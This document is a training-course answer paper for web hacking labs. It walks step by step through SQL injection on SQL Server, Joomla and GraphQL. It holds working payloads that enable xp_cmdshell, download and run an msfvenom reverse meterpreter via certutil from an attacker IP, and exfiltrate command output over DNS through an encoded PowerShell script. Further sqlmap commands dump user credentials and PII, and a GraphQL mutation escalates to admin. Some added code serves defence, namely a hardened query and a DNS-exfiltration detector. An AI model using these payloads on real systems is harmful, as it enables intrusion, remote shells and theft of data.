AnswerSheet Part3

The document is a detailed answer paper for an Advanced Web Hacking training course, covering various modules including SQL Injection techniques, file uploads, and Server Side Request Forgery (SSRF). It provides step-by-step solutions to challenges related to SQL injection, including second-order SQL injection, data exfiltration, and obtaining a reverse shell. Each section outlines specific methods and payloads used to exploit vulnerabilities in web applications, particularly those built on .NET and SQL Server.


Advanced Web Hacking (Part 3)
Answer Paper

NSS Training – AWH 5D Answer Paper

Contents

Module: SQL Injection Masterclass
  Second Order SQL Injection
  SQLi Through Crypto - OOB
  SQL Injection to Reverse Shell
  Second-order SQL Injection on Joomla
  Advanced SQLMAP Usage with eval option
  Data Exfiltration over DNS via SQLi
  GraphQL Exploitation

Module: Tricky file uploads
  Bypassing File Validations #1
  Bypassing File Validations #2
  SQLi via File Metadata

Module: Server Side Request Forgery (SSRF)
  SSRF To Check Open Ports and Fetch File
  SSRF via PDF Generation

© Claranet Cyber Security 2021. All rights reserved

Module: SQL Injection Masterclass

Second Order SQL Injection

Challenge URL: http://topup.webhacklab.com/Account/SecurityQuestion

• Identify a Second order injection using your account.
• Exploit the injection to extract the name of the user running the service.

Solution:
Step 1: Create an account in the topup application, set up a secret question in the profile, log out of the
application and navigate to the password reset functionality.

Choose the method ‘Answer Secret Questions’ and provide the account email address. Notice that
the application displays the security question set previously.


Step 2: Notice that the application is developed in .NET with the MVC framework. Hence MS-SQL Server is
the most likely backend database.

Step 3: Log in to the application again and inject the payload “' waitfor delay '0:0:10' --” into the
Question field, as shown below:


Step 4: Log out and visit the password reset functionality as done earlier. Input an answer and click
on “RESET PASSWORD”.

Step 5: Capture the request in Burp and observe it in Burp Repeater, since we have injected a
time-delay payload (the response time can be checked with either Burp Repeater or Burp Intruder).
The application will respond after approximately 10 seconds.


Step 6: The previous step confirms the presence of a second order SQL injection. Start tcpdump on
your kali VM to dump dns requests, using the following command:

root@Kali:~# sudo tcpdump -vvv -n port 53 -i any

Repeating the previous steps, inject and execute the following payload to check if OOB calls can be
made using xp_dirtree:

';exec master..xp_dirtree '\\userX.webhacklab.com\' --

Note: Each time you try this, add a different, random subdomain name before the domain
“userX.webhacklab.com” (e.g. randomaaaaaa.userX.webhacklab.com)

Step 7: Output of tcpdump will show that the DNS requests are being received by the host.


Step 8: Again run tcpdump to dump dns requests, using the following command:

root@Kali:~# sudo tcpdump -vvv -n port 53 -i any

Again repeating the previous steps, inject and execute the following payload to run a database
query and receive the database system username over the OOB channel:

'; DECLARE @data varchar(1024); SELECT @data = (SELECT SYSTEM_USER); EXEC('master..xp_dirtree "\\'+@data+'.userX.webhacklab.com\foo$"'); --

Step 9: Tcpdump will show that the DNS requests are being received by the host, with the subdomain
being the result of the SQL query ‘SELECT SYSTEM_USER’.


Step 10: Repeating the previous steps, inject and execute the following payload to check if the
current user has the sysadmin privilege:

'; DECLARE @data varchar(1024); SELECT @data = (SELECT IS_SRVROLEMEMBER('sysadmin')); EXEC('master..xp_dirtree "\\'+@data+'.userX.webhacklab.com\foo$"'); --

Step 11: Tcpdump will show that the DNS requests are being received by the host, confirming that the
current user has sysadmin privileges.


Step 12: Repeating the same steps, inject and execute the following payload to enable xp_cmdshell
(disabled by default):

';EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE; --

Step 13: Assuming that our last payload worked and enabled xp_cmdshell, inject the following
payload to extract the username:

';exec master..xp_cmdshell 'cmd.exe /c certutil -urlcache -split -f http://192.168.4.X:8000/%username%' --

On your kali machine start a python web server using the following command:

root@Kali:~# python3 -m http.server


Step 14: Execute the payload using the password reset functionality.

Step 15: Once the payload is executed in the above step, the Python server should receive a
request containing the username.


SQLi Through Crypto - OOB

Challenge URL: http://topup.webhacklab.com/Shop/Order

• Identify a data encryption endpoint using your registered account.
• Utilize the knowledge of the encryption endpoint to confirm SQL injection using an OOB
channel.

Solution:
Step 1: Navigate to the recharge functionality of the topup application. Provide a voucher code and
intercept the request using Burp Proxy.


Step 2: Send the same request to Burp Repeater. Notice that the application sends a request to the
server and gets back an encrypted value of the voucher code.


Step 3: Repeat Step 1 with the value of the voucher code being the payload

' waitfor delay '0:0:10' --


Step 4: Observe the change in the encrypted value of the voucher code. (Notice that the application
is developed in .NET with the MVC framework. Hence SQL Server is the most likely backend
database.)

Step 5: Fill in the other details of the recharge page and submit the request. After completing the
payment process, the application sends a link to the registered email address. Opening that link will
show the details of the order. Notice that this link has a similar encrypted value for the parameter
“Transactionid”.


Step 6: The figure shows that the application sends two consecutive requests when we access
“Order Confirmation” URL from mail as stated in the above step. Send the highlighted request
“/api/order?Transactionid=<transaction_id>” to Burp repeater:

Step 7: Change the value of the parameter “Transactionid” to the payload generated in Step 3.
Notice that the third-party application sends a response after a delay of approximately 10 seconds
as defined in the payload.

Note: Repeating these steps with different sleep time values can confirm the presence of SQL
injection in the payment gateway.


Step 8: Continuing with the last step, let’s exploit this further to retrieve the data using an
out-of-band (OOB) channel - DNS. We already identified that the application is developed in .NET with
the MVC framework and that the backend database is SQL Server, so the operating system could be
Windows. Start a DNS listener on your kali VM using the following command:

root@Kali:~# tcpdump -n udp port 53 -i any

Step 9: xp_cmdshell was enabled in the earlier exercise, so we can use it. If needed, it can be enabled
using the following command:

';exec sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE; --

Enter the payload

';exec master..xp_cmdshell 'cmd.exe /c nslookup userX.webhacklab.com' --

in the parameter ‘code’ and submit the request; the response will have the encrypted form of the
payload.


Step 10: When we submit this encrypted payload through the “Transactionid” parameter, the SQL Server
extended stored procedure “xp_cmdshell” will run the command “cmd.exe /c nslookup
userX.webhacklab.com” on the host and send a request to resolve userX.webhacklab.com to our host.

Step 11: We will receive requests to resolve “userX.webhacklab.com” on our host, confirming that
our payload executed successfully on the host.


SQL Injection to Reverse Shell

Challenge URL: http://topup.webhacklab.com/api/voucher

• Continue with the previous exercise to obtain a reverse shell on the DB host using
Metasploit and native Windows tools (powershell, certutil, cscript etc.).

Solution:
Step 1: Continuing with the last exercise, let’s exploit this further to get a reverse shell using
inferential/blind SQL injection. We already identified that the application is developed in .NET with the
MVC framework, the backend database is SQL Server and the operating system is Windows. Generate a
payload using msfvenom with the following command:

root@kali:~/tools# msfvenom -p windows/x64/meterpreter_reverse_http LHOST=192.168.4.X LPORT=<PORT> -f exe > userX.exe

Step 2: Host the generated payload using python web server on the attacker box:

root@kali:~# python3 -m http.server


Step 3: Navigate to the topup functionality of the application and, as in the earlier exercise, inject
the following payload into the parameter code and send the request:

';exec master..xp_cmdshell 'cmd.exe /c certutil -urlcache -split -f http://192.168.4.X:8000/userX.exe c:\windows\temp\userX.exe' --

Step 4: As we did in previous exercises, use the encrypted payload and inject in the “Transactionid”
parameter of the order request to execute the payload.


Step 5: The python server should receive a request from the victim host, as shown below:

Step 6: Stop the python server and start a metasploit handler using the following commands:

root@Kali:~# msfconsole

msf > use exploit/multi/handler

msf exploit(handler) > set payload windows/x64/meterpreter_reverse_http

msf exploit(handler) > set LHOST 192.168.4.X

msf exploit(handler) > set LPORT <PORT>

msf exploit(handler) > run


Step 7: Navigate to the topup functionality of the application, send the following payload in the apply
coupon feature and send the request to generate the encrypted payload. Enter the encrypted
payload received in the vulnerable parameter as seen in the previous exercise.

';exec master..xp_cmdshell 'cmd.exe /c c:\windows\temp\userX.exe' --

Step 8: Use the encrypted payload and inject in the “Transactionid” parameter of the order request
to execute the payload.


Step 9: You should receive a meterpreter session in your metasploit session, as shown below:


Second-order SQL Injection on Joomla

Challenge URL: http://cms.webhacklab.com:81/administrator/index.php

• Identify and exploit a second order SQL injection point in the Joomla instance
• Fetch the databases from the database server

Solution:
Step 1: Log in to the application using a user with manager privileges:

Step 2: Navigate to User’s profile edit page:


Step 3: Save the profile, intercept the request in Burp Proxy and send this request to Burp
Repeater:

Step 4: Insert a single quote (') into the value of the parameter “jform[params][admin_style]” and forward
the request:


Step 5: The payload is stored in the database, but no error is thrown back:

Step 6: Navigate to the “http://cms.webhacklab.com:81/administrator/index.php” URL (the 2nd order SQL
injection point), which will show a SQL error message:


Step 7: Insert the payload 'nsstest' and click on the send button:

Step 8: The error on the second order page shows only the 1st character “n” of the payload “nsstest”:


Step 9: To confirm, insert the payload “AND sleep(5);--” and click on the send button:

Step 10: The error on the second order page still shows only the 1st character “A” of the payload, which
indicates that the parameter is an array and only its 0th index is being stored in the database:


Step 11: Insert the payload into the 0th index of the array parameter “jform[params][admin_style][0]” and
click on the send button:

Step 12: The error on the second order page now reflects the full payload:


Step 13: Insert the payload “extractvalue(0x0a,concat(0x0a,(select database())))” and click on the send
button to get the current database:

Step 14: The error on the second order page reflects the current database “joomla”:


Step 15: To automate the exploitation, add the payload insertion mark “*” to the crafted request so that
SQLmap can insert its payloads at the position where they will get executed:

extractvalue(0x0a,concat(0x0a,(select @@version where 1=1 *)))


Step 16: Run the Sqlmap tool on the request with the “--second-url” switch set to the error page URL:

root@Kali:~# sqlmap -r request.txt --dbms MySQL --second-url "http://cms.webhacklab.com:81/administrator/index.php" --dbs


Step 17: Sqlmap extracts all database names:


Advanced SQLMAP Usage with eval option

Challenge URL: http://topup.webhacklab.com/api/Product/GetProduct?pid=&sig=

• Identify SQL Injection point
• Fetch the databases from the database server

Solution:
Step 1: Login to the application and navigate to the Topup and click on the “Three” option, as shown
below:


Step 2: Click on the ORDER button as shown in the figure below.

Step 3: Observe the request in Burp Suite and send the selected request to the Burp Suite Repeater tab.


Step 4: Observe the request and response as shown below:

Step 5: Modify the parameter pid; the request now returns a 500 error.


Step 6: View the source of the web page shown in Step 3; it contains the client-side code used to
generate the “sig” parameter, together with the static key used to compute it.

Step 7: Dynamically generate the sig parameter for the request using the following
Python code:

import hmac
import hashlib

# static key recovered from the page source in Step 6
key = b"9z$B&E)H@McQfTjWnZr4u7x!A%D*F-Ja"
# the signed message is the complete request URL, including the injected pid value
message = b"http://topup.webhacklab.com/api/Product/GetProduct?pid=2123 and 1=1"
# sig is the upper-case hex HMAC-SHA256 of the URL under the static key
sig = hmac.new(key, message, digestmod=hashlib.sha256).hexdigest().upper()
print(sig)

Step 8: Generate the “sig” parameter for the modified request shown in Step 5.


Step 9: Replace the signature and send the request which will respond with 200 OK.

Step 10: Inserting a boolean-based SQL payload with an “and” condition, and using the new signature
created by following Step 8 for the new pid, will return null.


Step 11: Inserting boolean SQL payload with “or” query and using the new signature created by
following Step 8 for the new pid will result in data.

Step 12: In order to run SQLmap, save the request in the “request.txt” file with the vulnerable
parameter marked with “*”. In our case the pid parameter is the vulnerable one.


Step 13: Add the --eval option, which will dynamically generate the sig parameter for every sqlmap
request:

root@Kali:~# sqlmap -r request.txt --eval='import hashlib;import hmac;sig=(hmac.new("9z$B&E)H@McQfTjWnZr4u7x!A%D*F-Ja", "http://topup.webhacklab.com/api/Product/GetProduct?pid=%s" % (pid), hashlib.sha256)).hexdigest().upper();' --dbs --batch

In case of a UTF encoding error (sqlmap running under Python 3, where hmac requires bytes), try the
following command:

sqlmap -r eval.txt --eval='import hmac;import hashlib;import base64;sig = hmac.new("9z$B&E)H@McQfTjWnZr4u7x!A%D*F-Ja".encode("utf-8"), ("http://topup.webhacklab.com/api/Product/GetProduct?pid=%s" % (pid)).encode("utf-8"), digestmod=hashlib.sha256).hexdigest().upper()' --dbs --batch

Step 14: We will be able to fetch all the database names from the DB server.
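The root cause in this exercise is that the signing key is shipped to the browser, so a valid signature says nothing about whether pid is safe. The following is an added example (not the lab's code) that puts the paper's pattern, trusting the sig and concatenating pid into SQL, next to a hardened handler that validates the type first, compares the MAC in constant time and binds the parameter. The signing scheme and key are the ones shown above; the SQLite product table is a constructed stand-in for the lab's SQL Server backend.

```python
"""Signed GetProduct request: the paper's handling beside a hardened one.

Added example, not the course's code.  The sig scheme (HMAC-SHA256 over the
full URL, upper-case hex) and the key are taken from the answer paper; the
SQLite table is a constructed stand-in for the lab's SQL Server database.
"""
import hashlib
import hmac
import re
import sqlite3

# Static key shipped to the browser in the page source (Step 6).  Every client
# can read it, so a valid signature proves nothing about who built the URL.
KEY = b"9z$B&E)H@McQfTjWnZr4u7x!A%D*F-Ja"
BASE_URL = "http://topup.webhacklab.com/api/Product/GetProduct?pid="
PID_RE = re.compile(r"[0-9]{1,9}")  # a product id is a small positive integer


def sign(pid_value: str) -> str:
    """The paper's sig: HMAC-SHA256 over the complete URL, hex, upper-cased."""
    msg = (BASE_URL + pid_value).encode("utf-8")
    return hmac.new(KEY, msg, hashlib.sha256).hexdigest().upper()


def make_db() -> sqlite3.Connection:
    """Constructed product table standing in for the lab database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO products VALUES (?, ?)",
                     [(1, "One"), (2, "Three"), (3, "Five")])
    return conn


def vulnerable_lookup(conn, pid_value: str, sig: str):
    """Pattern from the paper: trust the signature, concatenate pid into SQL.

    Anyone holding the leaked key can sign "2 or 1=1", so the signature check
    does nothing against the boolean-based injection seen in Steps 10-11.
    """
    if sig != sign(pid_value):  # also a timing-unsafe comparison
        return None
    return conn.execute(
        "SELECT id, name FROM products WHERE id = " + pid_value).fetchall()


def hardened_lookup(conn, pid_value: str, sig: str):
    """Validate the type first, compare in constant time, bind the parameter."""
    # Reject anything that is not a plain integer before SQL is ever built,
    # independently of whether the signature verifies.
    if not PID_RE.fullmatch(pid_value):
        return None
    if not hmac.compare_digest(sign(pid_value), sig.upper()):
        return None
    return conn.execute(
        "SELECT id, name FROM products WHERE id = ?", (int(pid_value),)).fetchall()


if __name__ == "__main__":
    db = make_db()
    forged = "2 or 1=1"
    print("vulnerable:", vulnerable_lookup(db, forged, sign(forged)))  # every row
    print("hardened:  ", hardened_lookup(db, forged, sign(forged)))    # None
    print("hardened:  ", hardened_lookup(db, "2", sign("2")))          # [(2, 'Three')]
```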


Data Exfiltration over DNS via SQLi

Challenge URL: http://topup.webhacklab.com/Account/SecurityQuestion

• Exploit the injection vulnerability to exfiltrate the output of the command “ipconfig” over a
DNS channel.

Solution:
Step 1: We have already identified that the application is developed in .NET with the MVC framework,
that the backend database is SQL Server and that it is vulnerable to SQL injection. Exploit this further to
retrieve data using an out-of-band (OOB) channel - DNS. Start a DNS listener on your kali VM using the
following command:

root@Kali:~# tcpdump -n udp port 53 -i any

Step 2: Enable xp_cmdshell using the following command.

';exec sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE; --


Step 3: Log in to the application and inject the payload below into the Question field, as shown
below:

';exec master..xp_cmdshell 'cmd.exe /c nslookup XXX.userX.webhacklab.com' --

Step 4: Next, log out and visit the Password Reset functionality as done in the earlier exercise. Input
the answer and click on ‘RESET PASSWORD’.


Step 5: Note the output of ‘tcpdump’. It will show that the DNS requests are being received by the
host.

Step 6: As there is a limit on size and type of data that can be sent over DNS channels, we need to
create a payload that will encode the output, break it into chunks and then send it over the DNS
channel with sequence numbers appended to them.

Once the OOB calls are received, the output can be sorted with the help of sequence numbers as
UDP packets do not have an arrival order.

The payload created is as shown below. It will send output of ipconfig over DNS to
userX.webhacklab.com.

'; exec master..xp_cmdshell 'cmd /v /c "ipconfig > C:\Windows\Temp\outputX && certutil -encodehex -f C:\Windows\Temp\outputX C:\Windows\Temp\outputX.hex 4 && powershell -enc
JAB0AGUAeAB0AD0ARwBlAHQALQBDAG8AbgB0AGUAbgB0ACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAF
QAZQBtAHAAXABvAHUAdABwAHUAdAAxADAALgBoAGUAeAA7ACQAcwB1AGIAZABvAG0AYQBpAG4APQAk
AHQAZQB4AHQALgByAGUAcABsAGEAYwBlACgAIgAgACIALAAiACIAKQA7ACQAagA9ADEAMQAxADEAMQ
A7AGYAbwByAGUAYQBjAGgAKAAkAGkAIABpAG4AIAAkAHMAdQBiAGQAbwBtAGEAaQBuACkAewAgACQA
ZgBpAG4AYQBsAD0AJABqAC4AdABvAHMAdAByAGkAbgBnACgAKQArACIALgAiACsAJABpACsAIgAuAG
YAaQBsAGUALgB1AHMAZQByADEAMAAuAHcAZQBiAGgAYQBjAGsAbABhAGIALgBjAG8AbQAiADsAJABq
ACAAKwA9ACAAMQA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ATgBvAE4AZQB3AFcAaQ
BuAGQAbwB3ACAAbgBzAGwAbwBvAGsAdQBwACAAJABmAGkAbgBhAGwAIAB9AA=="' --

Let’s understand the payload in parts:

First part: The command below runs ipconfig on the SQL server through xp_cmdshell, writes the output
to a file, then hex-encodes it with ‘certutil’ in a specific format: type 4 produces hex in space-separated
columns, without the ASCII characters and the address column.


exec master..xp_cmdshell 'cmd /v /c "ipconfig > C:\Windows\Temp\outputX && certutil -encodehex -f C:\Windows\Temp\outputX C:\Windows\Temp\outputX.hex 4

Second part: It runs a PowerShell script in Base64 encoded form to avoid breaking the SQL
syntax. This script reads the hex-encoded output file, breaks the content into chunks and then
generates DNS queries in the format
sequence_number.$Data.file.userX.webhacklab.com

Plain Script:

$text=Get-Content C:\Windows\Temp\outputX.hex;$subdomain=$text.replace(" ","");$j=11111;foreach($i in $subdomain){ $final=$j.tostring()+"."+$i+".file.userX.webhacklab.com";$j += 1; Start-Process -NoNewWindow nslookup $final }

The script is passed to PowerShell in encoded form with:

powershell -enc {$encoded_script}

The encoded form of the plaintext script is the Base64 blob shown in the full payload above.


Step 7: To create your own encoded string containing your IP address and file name, use the
PowerShell encoder here or use our utility hosted within the VPN at http://utility.webhacklab.com, as
shown in the screenshot below.

Step 8: Submit the final payload to the injection point.


Step 9: Before executing the payload run Tcpdump to capture the DNS queries and write it to a file,
as shown in the below figure:

root@Kali:~# tcpdump -n udp port 53 -i any | tee oob.txt

Step 10: As done earlier, execute the payload from reset password and observe the responses on
tcpdump.


Step 11: Once the execution completes, oob.txt will be created. Run the following command, which will
extract the required data from the file, arrange it based on sequence number and then hex-decode it:

root@Kali:~# egrep -o '[0-9]{5}+\.+[0-9a-fA-F]{0,62}' oob.txt|sort -u|cut -d. -f2|xxd -r -p
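From the defender's side, the same structure that makes the channel reassemblable (a fixed-width sequence label, a hex label, a constant "file" label) is what makes it detectable in resolver logs. The following is an added example, not the course's tooling, that parses tcpdump output in the format used in Steps 6 to 11, groups chunk-shaped queries per destination domain, flags domains above a chunk threshold and reassembles the data for triage, tolerating out-of-order and retransmitted UDP queries. The capture lines are constructed sample input; the lab domain is the one used in the paper.

```python
"""Detect and reassemble the chunked DNS exfiltration pattern from Steps 6-11:
one query per chunk, named <seq>.<hex>.file.<domain>.

Added example for the defender side (not the course's own tooling).  The
tcpdump lines below are constructed sample input; the domain is the lab
domain used in the paper.
"""
import re
from collections import defaultdict

# Constructed capture in "tcpdump -n udp port 53" format.  Chunks arrive out
# of order and chunk 11112 is retransmitted, as UDP allows.
SAMPLE_CAPTURE = """\
10:01:02.100001 IP 10.10.1.20.52113 > 10.10.1.1.53: 41001+ A? cdn.example.net. (33)
10:01:02.200002 IP 10.10.1.20.52114 > 10.10.1.1.53: 41002+ A? 11113.20202020204c696e6b2d6c6f63616c.file.userX.webhacklab.com. (84)
10:01:02.300003 IP 10.10.1.20.52115 > 10.10.1.1.53: 41003+ A? 11111.0d0a57696e646f777320495020436f6e.file.userX.webhacklab.com. (84)
10:01:02.400004 IP 10.10.1.20.52116 > 10.10.1.1.53: 41004+ A? 11112.66696775726174696f6e0d0a0d0a.file.userX.webhacklab.com. (82)
10:01:02.500005 IP 10.10.1.20.52117 > 10.10.1.1.53: 41005+ A? 11112.66696775726174696f6e0d0a0d0a.file.userX.webhacklab.com. (82)
10:01:02.600006 IP 10.10.1.20.52118 > 10.10.1.1.53: 41006+ A? mail.example.net. (34)
"""

# Queried name as tcpdump prints it: the label after "A?" (or AAAA?/TXT?/CNAME?),
# up to the trailing dot and the "(length)" suffix.
QNAME_RE = re.compile(r"\b(?:A|AAAA|TXT|CNAME)\? (\S+?)\.? \(\d+\)")

# One chunk: 5-digit sequence number, hex payload (a DNS label holds at most
# 63 bytes, so at most 62 hex characters), the literal "file" label used by
# the paper's script, then the attacker-controlled domain.
CHUNK_RE = re.compile(
    r"^(?P<seq>\d{5})\.(?P<hex>[0-9a-fA-F]{1,62})\.file\.(?P<domain>[A-Za-z0-9.-]+)$"
)


def parse_qnames(capture: str) -> list:
    """Return every queried name found in a tcpdump text capture."""
    return [m.group(1) for m in QNAME_RE.finditer(capture)]


def collect_chunks(qnames):
    """Group chunk-shaped names by destination domain: {domain: {seq: hex}}.

    Retransmitted duplicates (same seq, same hex) collapse.  A seq seen with
    two different payloads is recorded in 'conflicts' so the analyst knows the
    reassembled bytes at that position are not trustworthy.
    """
    chunks = defaultdict(dict)
    conflicts = defaultdict(set)
    for name in qnames:
        m = CHUNK_RE.match(name)
        if not m:
            continue
        domain = m.group("domain").lower()
        seq, payload = int(m.group("seq")), m.group("hex").lower()
        previous = chunks[domain].get(seq)
        if previous is not None and previous != payload:
            conflicts[domain].add(seq)
        chunks[domain][seq] = payload
    return chunks, conflicts


def reassemble(seq_to_hex) -> bytes:
    """Order chunks by sequence number (UDP gives no arrival order) and decode.

    Odd-length hex means a truncated chunk: drop the dangling nibble rather
    than raise, so partial evidence is still recoverable.
    """
    out = bytearray()
    for seq in sorted(seq_to_hex):
        h = seq_to_hex[seq]
        if len(h) % 2:
            h = h[:-1]
        out += bytes.fromhex(h)
    return bytes(out)


def analyze(capture: str, min_chunks: int = 3):
    """Flag domains that received at least min_chunks distinct chunks.

    Returns {domain: {"chunks": n, "missing": [seq, ...],
                      "conflicts": [seq, ...], "data": bytes}}.
    """
    chunks, conflicts = collect_chunks(parse_qnames(capture))
    findings = {}
    for domain, seq_map in chunks.items():
        if len(seq_map) < min_chunks:
            continue
        seqs = sorted(seq_map)
        missing = [s for s in range(seqs[0], seqs[-1] + 1) if s not in seq_map]
        findings[domain] = {
            "chunks": len(seq_map),
            "missing": missing,
            "conflicts": sorted(conflicts.get(domain, ())),
            "data": reassemble(seq_map),
        }
    return findings


if __name__ == "__main__":
    for domain, f in analyze(SAMPLE_CAPTURE).items():
        print(f"{domain}: {f['chunks']} chunks, missing={f['missing']}, "
              f"conflicts={f['conflicts']}")
        print(f["data"].decode("ascii", "replace"))
```

Pipe a live capture into `analyze()` the same way the paper tees tcpdump into oob.txt; the `missing` list tells you whether the recovered file is complete before you act on its contents.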


GraphQL Exploitation

Challenge URL: http://expense.webhacklab.com:3000/viewexpense

• Exploit SQL injection in one of the GraphQL endpoints and retrieve admin credentials.
• Use Introspection to extract the PII (Salary) of the ‘[email protected]’.
• Using GraphQL mutation, view expenses of all the users.

Part 1: Exploit SQL injection in one of the GraphQL endpoints and retrieve admin credentials.

Solution:
Step 1: Navigate to 'http://expense.webhacklab.com:3000/' and register an account. Enter
credentials and click on 'Sign In'.

Step 2: Click on ‘AddExpense’ and fill in any random expense.


Step 3: The expense will be added. Now click on ‘ViewExpense’ as shown:

Step 4: Analyze the HTTP Request content. The request shows the expenses for a particular date.


Step 5: Change the date field value to blank/null and observe the response.

Step 6: Change the date field value to “07-15-2020'” and send the request. Note that we have
added a single quote at the end of the date.


Step 7: There is a chance the 'date' variable in HTTP Request is vulnerable to SQL Injection. Let’s
add an ‘*’ at the date parameter and save the request for sqlmap:


Step 8: Run the following sqlmap commands and capture the admin credentials as shown in the
figure:

root@Kali:~# sqlmap -r graphql.txt --dbs

root@Kali:~# sqlmap -r graphql.txt --dbs -D 'ExpenseTracker' --tables

root@Kali:~# sqlmap -r graphql.txt --dbs -D 'ExpenseTracker' -T users

root@Kali:~# sqlmap -r graphql.txt --dbs -D 'ExpenseTracker' -T users -C email,salary,address,mobile,password --dump

Step 9: On completion of sqlmap, the credentials of all the users are visible in the output.


Part 2: Use Introspection to extract the PII (Salary) of the ‘[email protected]’.

Solution:
Step 1: Navigate to 'http://expense.webhacklab.com:3000/login', enter credentials and click on 'Sign
In'.

Step 2: Click on ‘ViewExpense’ as shown:


Step 3: Capture the Request in Burp Suite and send this to the Burp Repeater.


Step 4: Create an Introspection query to fetch schema information and send it to the GraphQL
endpoint.

Introspection Query:

{"query":"{__schema{types{name,fields{name}}}}"}

After analyzing the Introspection results, observe that the GraphQL endpoint has a query named
'users' which takes an argument called 'ID' as shown in Figure:


Step 5: After analyzing the users query result, observe that sensitive information of the user like
'salary', 'address', 'mobile number' based on supplied ID was returned, as shown in Figure:

Step 6: Now craft a GraphQL query to fetch user information based on ID value as shown in Figure:

GraphQL Query:

{"query":"query ($id: ID!){\n users (id: $id){id\nfirstname\nlastname\nemail\nmobile\naddress\nsalary}\n }","variables":{"id":"1"}}


Step 7: To fetch the information of the user with id '9', replace the variable value '1' with '9' as shown in
the figure; the response contains that user's salary.


Part 3: Using GraphQL mutation, view expenses of all the users.

Solution:
Step 1: Navigate to 'http://expense.webhacklab.com:3000/login', enter credentials and click on 'Sign
In'.

Step 2: Capture the login request and send it to the Burp Repeater.


Step 3: Decode the JWT from the HTTP response (its header and payload segments are Base64url encoded) and
observe that the user role claim is 'isAdmin=false'.

Step 4: Navigate to the 'ViewExpense' page and observe that you can only view the expenses added by
yourself.


Step 5: Create an Introspection query to fetch GraphQL schema information and send it to the
GraphQL endpoint.

Introspection Query:
{"query":"{__schema{types{name,fields{name}}}}"}

After analysing the HTTP response to the introspection query, observe that the GraphQL endpoint exposes
mutations named 'addExpense' and 'updateUser'.

Step 6: To fetch mutation schema information, send the below mutation query to the GraphQL
endpoint.

Introspection Mutation Query:

{"query":"{__schema{mutationType{name,fields{name,args{name}}}}}"}


Note: From the 'updateUser' mutation information in the HTTP response, observe that user attributes such as
'firstname', 'salary', 'address' and 'mobile number' can be updated, and so can the user role 'isAdmin'.
The schema carries no authorisation information, so whether a normal user is actually allowed to set that
argument has to be tested.

Step 7: Craft a mutation that sets the user role 'isAdmin' to true, as shown in the figure:

GraphQL Query:

{"query":"mutation{\n updateUser(firstname: \"user\", lastname: \"updated\", mobile: \"0000000000\", address: \"AWH\", salary: \"2500\", isAdmin: true){\n isAdmin\n }\n}"}
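The following Python script is an added example (it is not part of the course material or of the lab application) that automates what Steps 4 to 7 of Part 2 and Steps 5 to 7 of Part 3 do by hand: it walks an introspection response, lists the fields whose names suggest PII, lists the arguments each mutation accepts, flags arguments that look like role flags, and builds the users(id:) request body with a GraphQL variable. The introspection JSON embedded below is constructed, and the type, field and argument names in it are assumptions chosen to mirror the walkthrough.

```python
import json

# Constructed introspection response (not captured from the lab). Its shape is what
# {"query":"{__schema{mutationType{name} types{name fields{name args{name}}}}}"} returns;
# the type, field and argument names are assumptions chosen to mirror the walkthrough.
SAMPLE_INTROSPECTION = {"data": {"__schema": {
    "queryType": {"name": "Query"},
    "mutationType": {"name": "Mutation"},
    "types": [
        {"name": "Query", "fields": [
            {"name": "users", "args": [{"name": "id"}]},
            {"name": "expenses", "args": []}]},
        {"name": "Mutation", "fields": [
            {"name": "addExpense", "args": [{"name": "amount"}, {"name": "description"}]},
            {"name": "updateUser", "args": [
                {"name": "firstname"}, {"name": "lastname"}, {"name": "mobile"},
                {"name": "address"}, {"name": "salary"}, {"name": "isAdmin"}]}]},
        {"name": "User", "fields": [
            {"name": "id", "args": []}, {"name": "firstname", "args": []},
            {"name": "lastname", "args": []}, {"name": "email", "args": []},
            {"name": "mobile", "args": []}, {"name": "address", "args": []},
            {"name": "salary", "args": []}, {"name": "isAdmin", "args": []}]},
        {"name": "Expense", "fields": [
            {"name": "id", "args": []}, {"name": "amount", "args": []}]},
        {"name": "String", "fields": None},
        {"name": "__Schema", "fields": [{"name": "types", "args": []}]},
    ]}}}

# Field names that usually carry PII or an authorisation decision; extend per target.
SENSITIVE_FIELDS = {"salary", "address", "mobile", "password", "isadmin", "ssn", "token"}


def _types(introspection):
    return introspection["data"]["__schema"]["types"]


def sensitive_fields(introspection, watchlist=SENSITIVE_FIELDS):
    """Map each application type to the fields whose names look sensitive.
    Introspection meta-types (names starting with __) and scalars are skipped."""
    hits = {}
    for t in _types(introspection):
        if t["name"].startswith("__") or not t.get("fields"):
            continue
        found = [f["name"] for f in t["fields"] if f["name"].lower() in watchlist]
        if found:
            hits[t["name"]] = found
    return hits


def mutation_args(introspection):
    """Return {mutation name: [argument names]} for the schema's mutation type."""
    mutation_type = introspection["data"]["__schema"].get("mutationType")
    if not mutation_type:
        return {}
    for t in _types(introspection):
        if t["name"] == mutation_type["name"]:
            return {f["name"]: [a["name"] for a in f.get("args") or []] for f in t["fields"]}
    return {}


def privilege_args(introspection, markers=("admin", "role")):
    """Mutations accepting an argument that looks like a role flag the client should never set."""
    out = {}
    for mutation, args in mutation_args(introspection).items():
        flagged = [a for a in args if any(m in a.lower() for m in markers)]
        if flagged:
            out[mutation] = flagged
    return out


def build_user_query(user_id, fields):
    """Request body for one user by id, passing the id as a GraphQL variable."""
    query = "query ($id: ID!) { users(id: $id) { " + " ".join(fields) + " } }"
    return json.dumps({"query": query, "variables": {"id": str(user_id)}})


if __name__ == "__main__":
    print("sensitive fields:", sensitive_fields(SAMPLE_INTROSPECTION))
    print("mutation arguments:", mutation_args(SAMPLE_INTROSPECTION))
    print("privilege arguments:", privilege_args(SAMPLE_INTROSPECTION))
    print(build_user_query(9, ["id", "email", "salary"]))
```

Against a real target, replace SAMPLE_INTROSPECTION with the parsed response of the introspection query from Step 4 (with args{name} added to the fields selection) and POST the body returned by build_user_query from Burp Repeater.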

Step 8: Logout and login again with the same user.


Step 9: Decode the JWT from the HTTP response again and observe that the user role claim is now
'isAdmin=true'.

Step 10: Navigate to ‘ViewExpense’ and observe that you can view the expenses of all the users.
